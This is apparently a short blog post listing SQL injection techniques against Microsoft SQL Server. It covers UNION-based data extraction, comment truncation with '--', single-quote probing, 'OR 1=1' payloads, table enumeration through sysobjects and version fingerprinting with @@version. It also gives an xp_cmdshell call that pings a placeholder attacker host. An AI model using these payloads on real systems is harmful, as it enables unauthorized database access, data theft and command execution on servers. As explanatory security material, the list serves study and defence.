Tricks attackers use
UNION statements to append data ripped from other SQL
“--”double hyphen comment indicator to block out the rest of the
intended SQL
Try a single quote in input fields to see if the query fails (failure usually
indicates bad input validation and possible exploitation)
Use logical expression ‘OR 1=1 -- To return multiple records
exec master..xp_cmdshell ‘ping HACKER_IP’to
check for ‘sa’-level exploitable hosts
select name from sysobjects where type = ‘u’
can expose tables to exploit
Insert tablename exec sp_whatever –good way to see
output of stored procedures
Use @@version to return SQL Server and OS versions and Service
Packs
No comments:
Post a Comment